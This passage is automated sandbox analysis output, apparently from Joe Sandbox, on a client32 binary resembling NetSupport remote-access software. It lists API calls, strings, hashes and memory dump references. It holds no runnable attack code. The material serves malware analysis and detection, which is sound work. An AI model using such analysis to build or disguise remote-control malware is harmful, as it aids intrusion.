                                                                                        • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                                        • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                                        • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11133B70
                                                                                        • GetTickCount.KERNEL32(?), ref: 11133BA1
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                        • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                        • API String ID: 1170620360-4157686185
                                                                                        • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                        • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                        • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                        • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                        APIs
                                                                                        • _strtok.LIBCMT ref: 11027286
                                                                                        • _strtok.LIBCMT ref: 110272C0
                                                                                        • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _strtok$Sleep
                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                        • API String ID: 2009458258-3774545468
                                                                                        • Opcode ID: 85432cb8bd95123d380fc7145ed5d40164efb296651263655272b4fd187bab25
                                                                                        • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                        • Opcode Fuzzy Hash: 85432cb8bd95123d380fc7145ed5d40164efb296651263655272b4fd187bab25
                                                                                        • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                        • GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                        • InitializeCriticalSection.KERNEL32(``N,?,11031700,00000001,00000000), ref: 11110E98
                                                                                        • EnterCriticalSection.KERNEL32(``N,?,11031700), ref: 11110EAC
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                        • LeaveCriticalSection.KERNEL32(``N,?,11031700), ref: 11110F5F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent$``N
                                                                                        • API String ID: 1976012330-1798648567
                                                                                        • Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                        • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                        • Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
                                                                                        • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                        APIs
                                                                                          • Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                        • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                        • OpenDesktopA.USER32 ref: 11103803
                                                                                        • SetThreadDesktop.USER32 ref: 11103810
                                                                                        • CloseDesktop.USER32 ref: 11103829
                                                                                        • GetLastError.KERNEL32 ref: 11103831
                                                                                        • CloseDesktop.USER32 ref: 11103847
                                                                                        • GetLastError.KERNEL32 ref: 1110384F
                                                                                        Strings
                                                                                        • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                        • API String ID: 2036220054-60805735
                                                                                        • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                        • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                        • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                        • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                        • GetLastError.KERNEL32 ref: 1115F275
                                                                                        • wsprintfA.USER32 ref: 1115F288
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                        • API String ID: 1734919802-1728070458
                                                                                        • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                        • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                        • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                        • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                        APIs
                                                                                        • RegQueryInfoKeyA.ADVAPI32 ref: 110613A4
                                                                                        • _malloc.LIBCMT ref: 110613EB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • RegEnumValueA.ADVAPI32 ref: 1106142B
                                                                                        • RegEnumValueA.ADVAPI32 ref: 11061492
                                                                                        • _free.LIBCMT ref: 110614A4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                        • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                        • API String ID: 999355418-161875503
                                                                                        • Opcode ID: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
                                                                                        • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                        • Opcode Fuzzy Hash: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
                                                                                        • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                        APIs
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 1115C927
                                                                                        • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                        • wsprintfW.USER32 ref: 1115C967
                                                                                        • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                        • wsprintfW.USER32 ref: 1115CA27
                                                                                        • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                        • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                        • API String ID: 3050498177-823534439
                                                                                        • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                        • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                        • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                        • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,B24479DC,11030346,00000000), ref: 11017A6E
                                                                                        • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                        • GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                        • QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11017ADD
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCreateErrorEventFreeItemLastLoadProcQueueUserWork
                                                                                        • String ID: Kernel32.dll$QueueUserWorkItem
                                                                                        • API String ID: 3361249393-4150702566
                                                                                        • Opcode ID: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                        • Instruction ID: 8896b3f3378cccc65e9bab94f377e18e2855128faf3beda00f5a87bac3949b10
                                                                                        • Opcode Fuzzy Hash: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                        • Instruction Fuzzy Hash: 0121D3B1D52638ABDB10CFDAD984ADEFFB8EB49B10F10451BF421E7644C7B445008B91
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                        • String ID: bad cast
                                                                                        • API String ID: 2427920155-3145022300
                                                                                        • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                        • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                        • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                        • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
